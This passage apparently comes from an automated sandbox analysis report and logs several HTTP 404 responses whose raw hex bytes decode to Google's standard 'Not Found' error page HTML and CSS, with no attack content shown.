70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 